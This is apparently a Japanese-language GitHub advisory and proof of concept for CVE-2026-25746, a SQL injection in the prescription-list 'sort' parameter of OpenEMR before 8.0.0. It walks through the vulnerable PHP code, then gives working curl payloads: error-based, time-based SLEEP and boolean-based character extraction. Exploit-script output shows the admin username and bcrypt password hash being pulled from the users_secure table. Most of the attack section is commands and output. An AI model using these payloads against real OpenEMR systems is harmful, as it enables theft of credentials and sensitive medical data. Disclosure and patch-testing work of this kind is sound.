
CVE-2026-25746 - OpenEMR <8.0.0 におけるSQLインジェクションの脆弱性
弱点 CWE-89
SQLコマンドで使用される特殊要素の不適切な無害化('SQLインジェクション') この製品は、上流コンポーネントからの外部の影響を受ける入力を使用してSQLコマンドの全部または一部を構築しますが、下流コンポーネントに送信するときに、意図したSQLコマンドを変更する可能性がある特殊要素を無害化しない、または誤って無害化します。ユーザーが制御可能な入力におけるSQL構文の除去または引用が十分でない場合、生成されたSQLクエリは、それらの入力を通常のユーザーデータではなくSQLとして解釈させる可能性があります。MITREで詳細をご覧ください。
OpenEMR <8.0.0 には、認証済みの攻撃者によって悪用される可能性のある、処方機能におけるSQLインジェクションの脆弱性が存在します。この脆弱性は、処方一覧機能における不十分な入力検証に起因します。
この脆弱性は、処方一覧機能において、sortパラメータ内のユーザー指定入力が適切なサニタイズなしにSQLクエリに直接連結されるために発生します。これにより、攻撃者は悪意のあるSQLコードを注入することができます。
この脆弱性は以下のファイルに影響します:
\openemr\library\classes\Prescription.class.php 1148行目 の prescriptions_factory 関数\controllers\C_Prescription.class.php 180行目 の list_action 関数\openemr\controller.php 6行目$controller = new Controller();
echo $controller->act($_GET);
$args = array_reverse(array_keys($qarray));
$c_name = preg_replace("/[^A-Za-z0-9_]/", "", (string) array_pop($args));
...
$c_action = preg_replace("/[^A-Za-z0-9_]/", "", (string) array_pop($args));
...
$obj_name = "C_" . $c_name;
$c_obj = new $obj_name();
...
foreach ($args as $arg) {
$arg = preg_replace("/[^A-Za-z0-9_]/", "", (string) $arg);
if (empty($qarray[$arg]) && $qarray[$arg] != "0") {
$args_array[] = null;
} else {
$args_array[] = $qarray[$arg];
}
}
...
if (is_callable([&$c_obj, $c_action . "_action"]) && method_exists($c_obj, $c_action . "_action")) {
$output .= $c_obj->{$c_action . "_action"}(...$args_array);
}
C_Prescriptionのlist_actionメソッド
function list_action($id, $sort = "", $printPrescriptionId = null)
{
if (empty($id)) {
$this->function_argument_error();
exit;
}
if (!empty($sort)) {
$this->assign("prescriptions", Prescription::prescriptions_factory($id, $sort));
}
Prescriptionのprescriptions_factoryメソッドの脆弱性
static function prescriptions_factory(
$patient_id,
$order_by = "active DESC, date_modified DESC, date_added DESC"
) {
$prescriptions = [];
$p = new Prescription();
$sql = "SELECT id FROM " . escape_table_name($p->_table) . " WHERE patient_id = ? " .
"ORDER BY " . add_escape_custom($order_by);
$results = sqlQ($sql, [$patient_id]);
while ($row = sqlFetchArray($results)) {
$prescriptions[] = new Prescription($row['id']);
}
return $prescriptions;
}
if ((array_key_first($qarray) ?? '') == 'prescription') {
if (!AclMain::aclCheckCore('patients', 'rx')) {
echo (new TwigContainer(null, $GLOBALS['kernel']))->getTwig()->render('core/unauthorized.html.twig', ['pageTitle' => xl("Prescriptions")]);
exit;
}
}
patients に対するACL rx が必要です。これらは標準的な権限であり、昇格した特権ではありません。
SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY <injection>
┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=619d6abca06d21fe709779f348c0a5de" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort="'
SQL Statement failed on preparation: SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY \"'<br>
<h2><font color='red'>Query Error</font></h2><p><font color='red'>ERROR:</font> query failed: SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY \"</p><p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\"' at line 1</font></p><br />/var/www/localhost/htdocs/openemr/library/classes/Prescription.class.php at 1149:sqlQ<br />/var/www/localhost/htdocs/openemr/controllers/C_Prescription.class.php at 180:prescriptions_factory(1,")<br />/var/www/localhost/htdocs/openemr/library/classes/Controller.class.php at 157:list_action(1,")<br />/var/www/localhost/htdocs/openemr/controller.php at 6:act(Array)
┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=619d6abca06d21fe709779f348c0a5de" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort=(SELECT%201)'
┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=619d6abca06d21fe709779f348c0a5de" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort=(SELECT%20SLEEP(5))'
┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=5d884df35b6ff2fddf12d83da5095ae8" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort=(SELECT%20((ASCII(SUBSTRING(username,1,1))%20DIV%20128)MOD%202)%20FROM%20users%20LIMIT%201)'
これを悪用する方法は複数あります。その1つはブールベースの攻撃で、最後のペイロードを使用して機能します:
SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY (SELECT ((ASCII(SUBSTRING(username,1,1)) DIV 64)MOD 2) FROM users LIMIT 1)
┌──(kali㉿kali)-[~]
└─$ python3 exploit.py 172.18.0.3 b2b9f1cc76b47f8f13cc1f707baa0a64 users_secure --columns username password password_history1 password_history2 password_history3 password_history4
[+] Using patient_id=1
[+] Reference checksum (1): 604da4e5e2149a31fc68530bad701666942f600f
[+] Reference checksum (0): 66cfdfc2ad847a919672c75651b43749e1a5f38c
[#] Row count for table: users_secure 1
[#] String length: users_secure.username 0 5
[>] Character recovered: a
[>] Character recovered: d
[>] Character recovered: m
[>] Character recovered: i
[>] Character recovered: n
[+] Extracted string: ascii users_secure username 0 admin
[#] String length: users_secure.password 0 60
[>] Character recovered: $
[>] Character recovered: 2
[>] Character recovered: y
[>] Character recovered: $
[>] Character recovered: 1
[>] Character recovered: 2
[>] Character recovered: $
[>] Character recovered: g
[>] Character recovered: 4
[>] Character recovered: T
[>] Character recovered: y
[>] Character recovered: s
[>] Character recovered: 1
[>] Character recovered: l
[>] Character recovered: x
[>] Character recovered: A
[>] Character recovered: f
[>] Character recovered: t
[>] Character recovered: B
[>] Character recovered: I
[>] Character recovered: u
[>] Character recovered: x
[>] Character recovered: y
[>] Character recovered: w
[>] Character recovered: o
[>] Character recovered: 5
[>] Character recovered: L
[>] Character recovered: z
[>] Character recovered: e
[>] Character recovered: V
[>] Character recovered: 7
[>] Character recovered: W
[>] Character recovered: 7
[>] Character recovered: a
[>] Character recovered: L
[>] Character recovered: B
[>] Character recovered: z
[>] Character recovered: O
[>] Character recovered: X
[>] Character recovered: g
[>] Character recovered: a
[>] Character recovered: C
[>] Character recovered: g
[>] Character recovered: U
[>] Character recovered: e
[>] Character recovered: v
[>] Character recovered: Z
[>] Character recovered: x
[>] Character recovered: A
[>] Character recovered: Y
[>] Character recovered: Q
[>] Character recovered: a
[>] Character recovered: X
[>] Character recovered: 0
[>] Character recovered: c
[>] Character recovered: y
[>] Character recovered: c
[>] Character recovered: 2
[>] Character recovered: i
[>] Character recovered: O
[+] Extracted string: ascii users_secure password 0 $2y$12$g4Tys1lxAftBIuxywo5LzeV7W7aLBzOXgaCgUevZxAYQaX0cyc2iO
[#] String length: users_secure.password_history1 0 0
[#] String length: users_secure.password_history2 0 0
[#] String length: users_secure.password_history3 0 0
[#] String length: users_secure.password_history4 0 0
┌──(kali㉿kali)-[~]
└─$
https://www.cve.org/CVERecord?id=CVE-2026-25746
このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
私たちの論文の引用をお願いします: https://github.com/ChrisSub08/CVE-2026-25746_SqlInjectionVulnerabilityOpenEMR7.0.4